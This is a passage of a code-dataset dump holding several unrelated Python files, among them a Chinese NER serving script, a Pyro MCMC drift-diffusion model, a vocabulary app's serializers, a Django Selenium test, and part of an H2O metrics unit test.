'nwords': [nwords]})\n return predictions\n\n\nif __name__ == '__main__':\n export_dir = 'saved_model'\n subdirs = [x for x in Path(export_dir).iterdir()\n if x.is_dir() and 'temp' not in str(x)]\n latest = str(sorted(subdirs)[-1])\n predict_fn = partial(predict, predictor.from_saved_model(latest))\n print(LINE)\n print(extract_entities(predict_fn(LINE)['tags'], LINE))\n line = input('\\n\\n输入一句中文: ')\n while line.strip().lower() != 'q':\n print('\\n\\n', extract_entities(predict_fn(line)['tags'], line))\n line = input('\\n\\n输入一句中文: ')\n","repo_name":"linguishi/chinese_NER","sub_path":"bilstm_crf/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"41218799024","text":"import torch\nimport pyro\nimport pyro.distributions as dist\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom torch.distributions.constraints import positive\n\nimport logging\nimport os\n\n#import torch\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nimport scipy\n\nimport pyro\nimport ssms\nimport lanfactory\n#torch.set_default_dtype(torch.float64)\ntorch.set_default_dtype(torch.float32)\n\nfrom lanfactory.trainers.torch_mlp import TorchMLP \n\nimport lanfactory\nimport ssms\nfrom copy import deepcopy\n\nsmoke_test = ('CI' in os.environ)\nassert pyro.__version__.startswith('1.8.1')\n\npyro.enable_validation(True)\npyro.set_rng_seed(9)\nlogging.basicConfig(format='%(message)s', level=logging.INFO)\n\nimport math\nfrom numbers import Real\nfrom numbers import Number\n\nimport torch\nfrom torch.distributions import constraints\nfrom torch.distributions.exp_family import ExponentialFamily\nfrom torch.distributions.utils import _standard_normal, broadcast_all\n\nfrom time import time\n\ndef sim_wrap(theta = torch.zeros(0), model = 'ddm'):\n theta = theta.numpy().astype(np.float32)\n out = ssms.basic_simulators.simulator(theta = theta,\n model = model,\n n_samples = 1,\n delta_t = 0.001,\n max_t = 20.0,\n no_noise = False,\n bin_dim = None,\n bin_pointwise = False)\n \n return torch.tensor(np.hstack([out['rts'].astype(np.float32), out['choices'].astype(np.float32)]))\n\nclass LoadTorchMLP:\n def __init__(self, \n model_file_path = None,\n network_config = None,\n input_dim = None):\n \n ##torch.backends.cudnn.benchmark = True\n self.dev = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n self.model_file_path = model_file_path\n self.network_config = network_config\n self.input_dim = input_dim\n \n self.net = lanfactory.trainers.torch_mlp.TorchMLP(network_config = self.network_config,\n input_shape = self.input_dim,\n generative_model_id = None)\n self.net.load_state_dict(torch.load(self.model_file_path))\n self.net.to(self.dev)\n\n # AF-TODO: Seemingly LoadTorchMLPInfer is still not callable !\n @torch.no_grad()\n def __call__(self, x):\n return self.net(x)\n\n @torch.no_grad()\n def predict_on_batch(self, x = None):\n return self.net(torch.from_numpy(x).to(self.dev)).cpu().numpy()\n \n \nclass CustomTorchMLP:\n def __init__(self, state_dict, network_config):\n self.weights = []\n self.biases = []\n self.activations = deepcopy(network_config['activations'])\n self.net_depth = len(self.activations)\n self.state_dict = state_dict\n cnt = 0\n for obj in self.state_dict:\n if 'weight' in obj:\n self.weights.append(deepcopy(self.state_dict[obj]).T)\n elif 'bias' in obj:\n self.biases.append(torch.unsqueeze(deepcopy(self.state_dict[obj]), 0))\n \n def forward(self, input_tensor):\n tmp = input_tensor\n for i in range(0, self.net_depth - 1, 1):\n tmp = torch.tanh(torch.add(torch.matmul(tmp, self.weights[i]), self.biases[i]))\n tmp = torch.add(torch.matmul(tmp, self.weights[self.net_depth - 1]), self.biases[self.net_depth - 1])\n return tmp\n \n\nclass CustomTorchMLPMod(torch.nn.Module):\n def __init__(self, state_dict, network_config):\n super(CustomTorchMLPMod, self).__init__()\n self.weights = []\n self.biases = []\n self.activations = deepcopy(network_config['activations'])\n self.net_depth = len(self.activations)\n self.state_dict = state_dict\n cnt = 0\n for obj in self.state_dict:\n if 'weight' in obj:\n self.weights.append(deepcopy(self.state_dict[obj]).T)\n elif 'bias' in obj:\n self.biases.append(torch.unsqueeze(deepcopy(self.state_dict[obj]), 0))\n #super().__init\n \n def forward(self, input_tensor):\n tmp = input_tensor\n for i in range(0, self.net_depth - 1, 1):\n tmp = torch.tanh(torch.add(torch.matmul(tmp, self.weights[i]), self.biases[i]))\n tmp = torch.add(torch.matmul(tmp, self.weights[self.net_depth - 1]), self.biases[self.net_depth - 1])\n return tmp\n \nclass MyDDMh(dist.TorchDistribution):\n# arg_constraints = {'loc': constraints.interval(-1, 1),\n# 'scale': constraints.interval(0.0001, 10)\n# }\n def __init__(self, v, a, z, t):\n self.net = network\n self.n_samples = n_samples_by_subject\n self.boundaries = model_config['param_bounds']\n self.out_of_bounds_val = -66.1\n self.v = v\n self.a = a\n self.z = z\n self.t = t\n \n if isinstance(v, Number): # and isinstance(a, Number):\n batch_shape = torch.Size()\n else:\n batch_shape = self.v.size()\n \n super().__init__(batch_shape = batch_shape, event_shape = torch.Size((2,))) #torch.Size((2,))) # event_shape = (1,))\n \n def sample(self):\n theta = torch.vstack([self.v, self.a, self.z, self.t]).T\n return sim_wrap(theta = theta, model = 'ddm')\n \n def log_prob(self, value):\n \n if self.v.dim() == 3:\n dat_tmp = value.repeat((self.v.size()[0], 1, 1, 1))\n\n tmp_params = torch.stack([self.v, self.a, self.z, self.t], \n dim = -1).tile((1, self.n_samples, 1, 1))\n \n net_in = torch.cat([tmp_params, dat_tmp], dim = -1)\n logp = torch.clip(self.net(net_in), min = -16.11)\n logp_squeezed = torch.squeeze(logp, dim = -1)\n \n # v constraint\n logp_squeezed = torch.where(net_in[:, :, :, 0] < torch.tensor(3.),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 0] > torch.tensor(-3.),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # a constraint\n logp_squeezed = torch.where(net_in[:, :, :, 1] < torch.tensor(2.5),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 1] > torch.tensor(0.3), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # z constraint\n logp_squeezed = torch.where(net_in[:, :, :, 2] < torch.tensor(0.9),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 2] > torch.tensor(0.1),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # t constraint\n logp_squeezed = torch.where(net_in[:, :, :, 3] < torch.tensor(2.0), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 3] > torch.tensor(0.0),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n \n logp_squeezed = logp_squeezed #.unsqueeze(1)\n \n else: # single particle:\n tmp_params = torch.stack([self.v, self.a, self.z, self.t], \n dim = -1).tile((self.n_samples, 1, 1))\n\n net_in = torch.cat([tmp_params, value], dim = -1)\n logp = torch.clip(self.net(net_in), min = -16.11)\n logp_squeezed = torch.squeeze(logp, dim = -1)\n\n # v constraint\n logp_squeezed = torch.where(net_in[:, :, 0] < torch.tensor(3.),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 0] > torch.tensor(-3.), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # a constraint\n logp_squeezed = torch.where(net_in[:, :, 1] < torch.tensor(2.5),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 1] > torch.tensor(0.3), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # z constraint\n logp_squeezed = torch.where(net_in[:, :, 2] < torch.tensor(0.9),\n logp_squeezed,\n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 2] > torch.tensor(0.1), \n logp_squeezed,\n torch.tensor(self.out_of_bounds_val))\n\n # t constraint\n logp_squeezed = torch.where(net_in[:, :, 3] < torch.tensor(2.0),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 3] > torch.tensor(0.0), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n return logp_squeezed\n \ndef hierarchical_ddm_model(num_subjects, num_trials, data):\n #v_mu_mu = pyro.sample(\"v_mu_mu\", dist.Uniform(-3, 3))\n v_mu_mu = pyro.sample(\"v_mu_mu\", dist.Normal(0, 0.5))\n v_mu_std = pyro.sample(\"v_mu_std\", dist.HalfNormal(100.))\n \n #a_mu_mu = pyro.sample(\"a_mu_mu\", dist.Uniform(0.3, 2.5))\n a_mu_std = pyro.sample(\"a_mu_std\", dist.HalfNormal(100.))\n a_mu_mu = pyro.sample(\"a_mu_mu\", dist.Normal(1.5, 0.5))\n\n #z_mu_mu = pyro.sample(\"z_mu_mu\", dist.Uniform(0.1, 0.9))\n z_mu_std = pyro.sample(\"z_mu_std\", dist.HalfNormal(100.))\n z_mu_mu = pyro.sample(\"z_mu_mu\", dist.Normal(0.5, 0.1))\n \n #t_mu_mu = pyro.sample(\"t_mu_mu\", dist.Uniform(0.0, 2.0))\n t_mu_std = pyro.sample(\"t_mu_std\", dist.HalfNormal(100.))\n t_mu_mu = pyro.sample(\"t_mu_mu\", dist.Normal(1.0, 0.5))\n\n with pyro.plate(\"subjects\", num_subjects) as subjects_plate:\n v_subj = pyro.sample(\"v_subj\", dist.Normal(v_mu_mu, v_mu_std))\n a_subj = pyro.sample(\"a_subj\", dist.Normal(a_mu_mu, a_mu_std))\n z_subj = pyro.sample(\"z_subj\", dist.Normal(z_mu_mu, z_mu_std))\n t_subj = pyro.sample(\"t_subj\", dist.Normal(t_mu_mu, t_mu_std))\n with pyro.plate(\"data\", num_trials) as data_plate:\n return pyro.sample(\"obs\", \n MyDDMh(v_subj, a_subj, z_subj, t_subj), \n obs = data) \n \nif __name__ == \"__main__\":\n\n# # Interface ----\n# CLI = argparse.ArgumentParser()\n# CLI.add_argument(\"--config_file\",\n# type = none_or_str,\n# default = None)\n# CLI.add_argument('--config_dict_key',\n# type = none_or_int,\n# default = None)\n \n# args = CLI.parse_args()\n# print(args)\n \n \n # # Load torch net ----------------\n # Model\n \n model = \"ddm\" # for now only DDM (once we have choice probability models --> all models applicable)\n model_config = ssms.config.model_config[model].copy() # convenience\n \n \n network_config = pickle.load(open('nets/d27193a4153011ecb76ca0423f39a3e6_' + \\\n 'ddm_torch__network_config.pickle', 'rb'))\n\n print(network_config)\n\n # Initialize network class\n torch_net = TorchMLP(network_config = network_config,\n input_shape = len(model_config['params']) + 2,\n generative_model_id = None)\n\n # Load weights and biases\n torch_net.load_state_dict(torch.load('nets/d27193a4153011ecb76ca0423f39a3e6_' + \\\n 'ddm_torch_state_dict.pt', \n map_location=torch.device('cpu')))\n\n # Turn torch network usable for us\n custom_torch_net = CustomTorchMLPMod(torch_net.state_dict(), \n network_config)\n custom_torch_net.eval()\n \n \n # Generate Data\n base_dim = 1\n n_subjects = 20\n n_samples_by_subject = 500\n buffer_coefficient = 0.5\n\n param_dict = {}\n data_list = []\n for param in model_config['params']:\n param_idx = model_config['params'].index(param)\n print('param')\n print(param)\n min_ = model_config['param_bounds'][0][param_idx]\n max_ = model_config['param_bounds'][1][param_idx]\n range_ = max_ - min_\n mean_ = (max_ + min_) / 2\n min_adj = mean_ - (0.5 * buffer_coefficient) * range_\n print(min_adj)\n max_adj = mean_ + (0.5 * buffer_coefficient) * range_\n print(max_adj)\n\n param_mu_mu = np.random.uniform(low = min_adj, high = max_adj) # potentially fix\n param_mu_std = np.random.uniform(low = 0.05, high = 0.1) # potentially fix\n param_mu = scipy.stats.norm.rvs(loc = param_mu_mu, scale = param_mu_std)\n param_std = scipy.stats.halfnorm.rvs(loc = 0, scale = 0.1) # potentially fix\n # param_std_std = scipy.stats.halfnorm(loc = 0, scale = 0.25) # potentially fix\n\n params_subj = np.random.normal(loc = param_mu, \n scale = param_std, \n size = n_subjects)\n\n param_dict[param + '_mu'] = param_mu.astype(np.float32)\n param_dict[param + '_std'] = param_std.astype(np.float32)\n param_dict[param + '_subj'] = params_subj.astype(np.float32)\n\n print(param_dict)\n\n for i in range(n_subjects):\n v = torch.zeros(base_dim) + param_dict['v_subj'][i]\n a = torch.zeros(base_dim) + param_dict['a_subj'][i]\n z = torch.zeros(base_dim) + param_dict['z_subj'][i]\n t = torch.zeros(base_dim) + param_dict['t_subj'][i]\n\n theta = torch.vstack([v, a, z, t]).T\n theta = theta.tile((n_samples_by_subject, 1))\n out = sim_wrap(theta = theta)\n # theta = torch.hstack([theta, out])\n data_list.append(out)\n \n data = torch.stack(data_list).permute(1, 0, 2)\n\n # NUTS VERSION\n from pyro.infer import MCMC, NUTS\n network = custom_torch_net\n num_chains = 4\n\n nuts_kernel = NUTS(hierarchical_ddm_model,\n step_size = 0.01,\n max_tree_depth = 5)\n #jit_compile = True,\n #ignore_jit_warnings = True)\n #max_tree_depth = 1)\n \n mcmc = MCMC(nuts_kernel, \n num_samples = 100, \n warmup_steps = 100, \n num_chains = num_chains, \n initial_params = {'v_mu_mu': torch.tensor(param_dict['v_mu']).repeat(num_chains, 1),\n 'v_mu_std': torch.tensor(param_dict['v_std']).repeat(num_chains, 1),\n 'a_mu_mu': torch.tensor(param_dict['a_mu']).repeat(num_chains, 1),\n 'a_mu_std': torch.tensor(param_dict['a_std']).repeat(num_chains, 1),\n 'z_mu_mu': torch.tensor(param_dict['z_mu']).repeat(num_chains, 1),\n 'z_mu_std': torch.tensor(param_dict['z_std']).repeat(num_chains, 1),\n 't_mu_mu': torch.tensor(param_dict['t_mu']).repeat(num_chains, 1),\n 't_mu_std': torch.tensor(param_dict['t_std']).repeat(num_chains, 1),\n 'v_subj': torch.tensor(param_dict['v_subj']).repeat(num_chains, 1),\n 'a_subj': torch.tensor(param_dict['a_subj']).repeat(num_chains, 1),\n 'z_subj': torch.tensor(param_dict['z_subj']).repeat(num_chains, 1),\n 't_subj': torch.tensor(param_dict['t_subj']).repeat(num_chains, 1),\n }\n )\n \n\n start_t = time()\n mcmc.run(n_subjects, n_samples_by_subject, data)\n end_t = time()\n \n # Make arviz data\n az_mcmc = az.from_pyro(mcmc)\n az_mcmc.posterior.attrs['runtime'] = end_t - start_t\n \n # Save arviz data:\n my_uuid = uuid.uuid1().hex\n pickle.dump(az_mcmc, \n open('/users/afengler/data/proj_lan_varinf/LAN_varinf/data/parameter_recovery/pyro_mcmc_' + my_uuid, 'wb'), \n protocol = 3) \n \n print('DONE')","repo_name":"AlexanderFengler/LAN_scripts","sub_path":"graveyard/pyro_multiprocessing_test.py","file_name":"pyro_multiprocessing_test.py","file_ext":"py","file_size_in_byte":17414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74630648835","text":"from typing import List, Dict\nfrom application.models.models import UserWord, UserStat, User\n\ndef serialize_user_words(words: List[UserWord]) -> List[Dict]: \n user_words = []\n for word in words: \n user_words.append({\n \"word_id\": word.word_id, \n \"user_id\": word.user_id, \n \"word\": word.word, \n \"word_type\": word.word_type, \n \"category\": word.category, \n \"definition\": word.definition, \n \"translated_language\": word.translated_language, \n \"translation\": word.translation, \n \"created_at\": word.created_at, \n \"correct\": word.correct, \n \"incorrect\": word.incorrect\n })\n if len(user_words) == 1: \n return [user_words[0]]\n return user_words\n\ndef serialize_word_with_score(word: UserWord, score: float) -> Dict:\n return {\n \"word_id\": word.word_id, \n \"user_id\": word.user_id, \n \"word\": word.word, \n \"word_type\": word.word_type, \n \"category\": word.category, \n \"definition\": word.definition, \n \"translated_language\": word.translated_language, \n \"translation\": word.translation, \n \"created_at\": word.created_at, \n \"correct\": word.correct, \n \"incorrect\": word.incorrect, \n \"score\": score\n }\n\ndef serialize_user_stats(stats: UserStat) -> Dict:\n serialized_data = {\n \"stat_id\": stats.stat_id, \n \"user_id\": stats.user_id, \n \"challenge_wins\": stats.challenge_wins, \n \"total_words_added\": stats.total_words_added, \n \"total_words_practiced\": stats.total_words_practiced, \n \"correct\": stats.correct, \n \"incorrect\": stats.incorrect\n }\n return serialized_data\n\ndef serialize_user(user: User) -> Dict: \n serialized_data = { \n \"user_id\": user.user_id, \n \"first_name\": user.first_name, \n \"last_name\": user.last_name, \n \"email\": user.email\n }\n return serialized_data\n","repo_name":"j0sh-k1m/vocabi","sub_path":"backend/application/utils/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3151038000","text":"from django.test import LiveServerTestCase\nfrom django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django.core.urlresolvers import reverse\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom todo.views import home\nfrom lists.models import Item\n\n\nclass HomeTestCase(LiveServerTestCase):\n\n def setUp(self):\n\n self.browser = webdriver.Firefox()\n self.browser.get(self.live_server_url)\n\n def tearDown(self):\n\n self.browser.quit()\n\n def check_for_row_in_list_table(self, row_text):\n # find to_do list in table\n\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n def test_check_my_table(self):\n\n # edith 접속\n self.assertIn('To-Do', self.browser.title)\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('공작깃털 사기')\n inputbox.send_keys(Keys.ENTER)\n\n edith_list_url = self.browser.current_url\n self.assertRegex(edith_list_url, '/lists/.+')\n self.check_for_row_in_list_table('1: 공작깃털 사기')\n\n self.browser.get(self.live_server_url)\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('공작깃털을 이용해서 그물 만들기')\n inputbox.send_keys(Keys.ENTER)\n\n self.check_for_row_in_list_table('2: 공작깃털을 이용해서 그물 만들기')\n self.check_for_row_in_list_table('1: 공작깃털 사기')\n\n self.browser.quit()\n self.browser = webdriver.Firefox()\n self.browser.get(self.live_server_url)\n\n # francis가 들어옴\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('우유 사기')\n inputbox.send_keys(Keys.ENTER)\n\n francis_list_url = self.browser.current_url\n self.assertRegex(francis_list_url, '/lists/.+')\n self.assertNotEqual(francis_list_url, edith_list_url)\n\n page_text = self.browser.find_elements_by_tag_name('body').text\n self.assertNotIn('공작깃털 사기', page_text)\n self.assertIn('우유사기', page_text)\n","repo_name":"yevgnenll/todo","sub_path":"todo/functional_tests/home_tests.py","file_name":"home_tests.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13351071464","text":"import sys\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators import H2OGradientBoostingEstimator\nfrom h2o.model import H2OBinomialModelMetrics\nfrom h2o.estimators import H2OUpliftRandomForestEstimator\n\nbase_metric_methods = ['aic', 'loglikelihood', 'auc', 'gini', 'logloss', 'mae', 'mean_per_class_error', 'mean_residual_deviance', 'mse',\n 'nobs', 'aucpr', 'pr_auc', 'r2', 'rmse', 'rmsle',\n 'residual_deviance', 'residual_degrees_of_freedom', 'null_deviance', 'null_degrees_of_freedom']\nmax_metrics = list(H2OBinomialModelMetrics.maximizing_metrics)\n\n\ndef pyunit_make_metrics(weights_col=None):\n fr = h2o.import_file(pyunit_utils.locate(\"smalldata/logreg/prostate.csv\"))\n fr[\"CAPSULE\"] = fr[\"CAPSULE\"].asfactor()\n fr[\"RACE\"] = fr[\"RACE\"].asfactor()\n fr.describe()\n\n response = \"AGE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n\n weights = None\n if weights_col:\n weights = h2o.assign(fr.runif(42), \"weights\")\n fr[weights_col] = weights\n\n print(\"\\n\\n======= REGRESSION ========\\n\")\n for distr in [\"gaussian\", \"poisson\", \"laplace\", \"gamma\"]:\n # Skipping on `laplace`\n # GBM training fails due to a bug: https://github.com/h2oai/h2o-3/issues/8158\n if weights_col is not None and distr == \"laplace\":\n continue\n print(\"distribution: %s\" % distr)\n model = H2OGradientBoostingEstimator(distribution=distr, ntrees=2, max_depth=3,\n min_rows=1, learn_rate=0.1, nbins=20, weights_column=weights_col)\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr), \"pred\")\n actual = fr[response]\n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, distribution=distr, weights=weights)\n m2 = h2o.make_metrics(predicted, actual, weights=weights)\n print(\"model performance:\")\n print(m0)\n print(\"make_metrics (distribution=%s):\" % distr)\n print(m1)\n print(\"make_metrics (distribution=None):\")\n print(m2)\n\n assert abs(m0.mae() - m1.mae()) < 1e-5\n assert abs(m0.mse() - m1.mse()) < 1e-5\n assert abs(m0.rmse() - m1.rmse()) < 1e-5\n assert abs(m0.mean_residual_deviance() - m1.mean_residual_deviance()) < 1e-5\n assert abs(m0.rmsle() - m1.rmsle()) < 1e-5\n\n assert abs(m2.mae() - m1.mae()) < 1e-5\n assert abs(m2.mse() - m1.mse()) < 1e-5\n assert abs(m2.rmse() - m1.rmse()) < 1e-5\n assert (abs(m1.mean_residual_deviance() - m2.mean_residual_deviance()) < 1e-7) == (distr == \"gaussian\")\n assert abs(m2.rmsle() - m1.rmsle()) < 1e-5\n\n print(\"\\n\\n======= BINOMIAL ========\\n\")\n response = \"CAPSULE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n model = H2OGradientBoostingEstimator(distribution=\"bernoulli\", ntrees=2, max_depth=3, min_rows=1,\n learn_rate=0.01, nbins=20, seed=1, weights_column=weights_col)\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr)[2], \"pred\")\n actual = h2o.assign(fr[response].asfactor(), \"act\")\n domain = [\"0\", \"1\"]\n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, domain=domain, weights=weights)\n m2 = h2o.make_metrics(predicted, actual, weights=weights)\n print(\"m0:\")\n print(m0)\n print(\"m1:\")\n print(m1)\n print(\"m2:\")\n print(m2)\n\n assert m0.accuracy()[0][1] + m0.error()[0][1] == 1\n assert len(m0.accuracy(thresholds='all')) == len(m0.fprs)\n\n assert m0.accuracy().value == m1.accuracy().value == m0.accuracy()[0][1]\n assert m0.accuracy().value + m0.error().value == 1\n\n assert isinstance(m0.accuracy(thresholds=0.4).value, float)\n assert m0.accuracy(thresholds=0.4).value == m1.accuracy(thresholds=0.4).value == m0.accuracy(thresholds=0.4)[0][1]\n assert m0.accuracy(thresholds=0.4).value + m0.error(thresholds=0.4).value == 1\n\n assert isinstance(m0.accuracy(thresholds=[0.4]).value, list)\n assert len(m0.accuracy(thresholds=[0.4]).value) == 1\n assert m0.accuracy(thresholds=[0.4]).value[0] == m0.accuracy(thresholds=0.4).value\n\n assert isinstance(m0.accuracy(thresholds=[0.4, 0.5]).value, list)\n assert len(m0.accuracy(thresholds=[0.4, 0.5]).value) == 2\n assert m0.accuracy(thresholds=[0.4, 0.5]).value == [m0.accuracy(thresholds=0.4).value, m0.accuracy(thresholds=0.5).value]\n\n # Testing base metric methods\n # FIXME: check the same failures for other ModelMetrics impl. and then fix'emall or move them out of base class...\n base_metrics_methods_failing_on_H2OBinomialModelMetrics = ['aic', 'loglikelihood', 'mae', 'mean_per_class_error', 'mean_residual_deviance', 'rmsle']\n for metric_method in (m for m in base_metric_methods if m not in base_metrics_methods_failing_on_H2OBinomialModelMetrics):\n m0mm = getattr(m0, metric_method)()\n m1mm = getattr(m1, metric_method)()\n m2mm = getattr(m2, metric_method)()\n\n assert m0mm == m1mm or abs(m0mm - m1mm) < 1e-5, \\\n \"{} is different for model_performance and make_metrics on [0, 1] domain\".format(metric_method)\n assert m1mm == m2mm or abs(m1mm - m2mm) < 1e-5, \\\n \"{} is different for make_metrics on [0, 1] domain and make_metrics without domain\".format(metric_method)\n # FIXME: for binomial mean_per_class_error is strangely accessible as an array\n assert abs(m0.mean_per_class_error()[0][1] - m1.mean_per_class_error()[0][1]) < 1e-5\n assert abs(m2.mean_per_class_error()[0][1] - m1.mean_per_class_error()[0][1]) < 1e-5\n\n failures = 0\n for metric_method in base_metrics_methods_failing_on_H2OBinomialModelMetrics:\n for m in [m0, m1, m2]:\n try:\n assert isinstance(getattr(m, metric_method)(), float)\n except:\n failures += 1\n assert failures == 3 * len(base_metrics_methods_failing_on_H2OBinomialModelMetrics)\n\n # Testing binomial-only metric methods\n binomial_only_metric_methods = ['accuracy', 'F0point5', 'F1', 'F2', 'mcc',\n 'max_per_class_error', 'mean_per_class_error',\n 'precision', 'recall', 'specificity', 'fallout', 'missrate', 'sensitivity',\n 'fpr', 'fnr', 'tpr', 'tnr']\n for metric_method in (m for m in binomial_only_metric_methods):\n # FIXME: not sure that returning a 2d-array is justified when not passing any threshold\n m0mm = getattr(m0, metric_method)()[0]\n m1mm = getattr(m1, metric_method)()[0]\n m2mm = getattr(m2, metric_method)()[0]\n assert m0mm == m1mm or abs(m0mm[1] - m1mm[1]) < 1e-5, \\\n \"{} is different for model_performance and make_metrics on [0, 1] domain\".format(metric_method)\n assert m1mm == m2mm or abs(m1mm[1] - m2mm[1]) < 1e-5, \\\n \"{} is different for make_metrics on [0, 1] domain and make_metrics without domain\".format(metric_method)\n\n # Testing confusion matrix\n cm0 = m0.confusion_matrix(metrics=max_metrics)\n assert len(cm0) == len(max_metrics)\n assert all([any(m in header for header in map(lambda cm: cm.table._table_header, cm0) for m in max_metrics)]), \\\n \"got duplicate CM headers, although all metrics are different\"\n cm0t = m0.confusion_matrix(metrics=max_metrics, thresholds=[.3, .6])\n assert len(cm0t) == 2 + len(max_metrics)\n assert 2 == sum([not any(m in header for m in max_metrics) for header in map(lambda cm: cm.table._table_header, cm0t)]), \\\n \"missing or duplicate headers without metric (thresholds only CMs)\"\n assert all([any(m in header for header in map(lambda cm: cm.table._table_header, cm0t) for m in max_metrics)]), \\\n \"got duplicate CM headers, although all metrics are different\"\n\n\n print(\"\\n\\n======= MULTINOMIAL ========\\n\")\n response = \"RACE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n model = H2OGradientBoostingEstimator(distribution=\"multinomial\", ntrees=2, max_depth=3, min_rows=1,\n learn_rate=0.01, nbins=20, weights_column=weights_col, auc_type=\"MACRO_OVR\")\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr)[1:], \"pred\")\n actual = h2o.assign(fr[response].asfactor(), \"act\")\n domain = fr[response].levels()[0] \n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, domain=domain, weights=weights, auc_type=\"MACRO_OVR\")\n m2 = h2o.make_metrics(predicted, actual, weights=weights, auc_type=\"MACRO_OVR\")\n\n assert abs(m0.mse() - m1.mse()) < 1e-5\n assert abs(m0.rmse() - m1.rmse()) < 1e-5\n assert abs(m0.logloss() - m1.logloss()) < 1e-5\n assert abs(m0.mean_per_class_error() - m1.mean_per_class_error()) < 1e-5\n assert abs(m0.auc() - m1.auc()) < 1e-5\n assert abs(m0.aucpr() - m1.aucpr()) < 1e-5\n\n assert abs(m2.mse() - m1.mse()) < 1e-5\n assert abs(m2.rmse() - m1.rmse()) < 1e-5\n assert abs(m2.logloss() - m1.logloss()) < 1e-5\n assert abs(m2.mean_per_class_error() - m1.mean_per_class_error()) < 1e-5\n assert abs(m2.auc() - m1.auc()) < 1e-5\n assert abs(m2.aucpr() - m1.aucpr()) < 1e-5\n\n\ndef pyunit_make_metrics_uplift():\n print(\"======= UPLIFT BINOMIAL ========\")\n treatment_column = \"treatment\"\n response_column = \"outcome\"\n feature_cols = [\"feature_\"+str(x) for x in range(1,13)]\n\n train = h2o.import_file(pyunit_utils.locate(\"smalldata/uplift/upliftml_train.csv\"))\n train[treatment_column] = train[treatment_column].asfactor()\n train[response_column] = train[response_column].asfactor()\n\n test = h2o.import_file(pyunit_utils.locate(\"smalldata/uplift/upliftml_test.csv\"))\n test[treatment_column] = test[treatment_column].asfactor()\n test[response_column] = test[response_column].asfactor()\n\n nbins = 20\n model = H2OUpliftRandomForestEstimator(\n treatment_column=treatment_column,\n seed=42,\n auuc_nbins=nbins,\n score_each_iteration=True,\n ntrees=3\n )\n\n model.train(y=response_column, x=feature_cols, training_frame=train, validation_frame=test)\n # test on validation data, train metrics are affected by sample rate\n m0 = model.model_performance(valid=True)\n predicted = h2o.assign(model.predict(test)[0], \"pred\")\n actual = test[response_column]\n treatment = test[treatment_column]\n m1 = model.model_performance(test_data=test, auuc_type=\"AUTO\")\n m2 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\", auuc_nbins=nbins)\n m3 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\",\n custom_auuc_thresholds=m1.thresholds())\n m4 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\",\n custom_auuc_thresholds=model.default_auuc_thresholds())\n new_nbins = nbins - 10\n m5 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\", auuc_nbins=new_nbins)\n\n print(\"Model AUUC: {}\".format(model.auuc()))\n print(\"thresholds: {}\".format(model.default_auuc_thresholds()))\n print(\"Model performance AUUC: {}\".format(m0.auuc()))\n print(\"thresholds: {}\".format(m0.thresholds()))\n print(\"Model performance AUUC: {}\".format(m1.auuc()))\n print(\"thresholds: {}\".format(m1.thresholds()))\n print(\"Make AUUC with no custom thresholds: 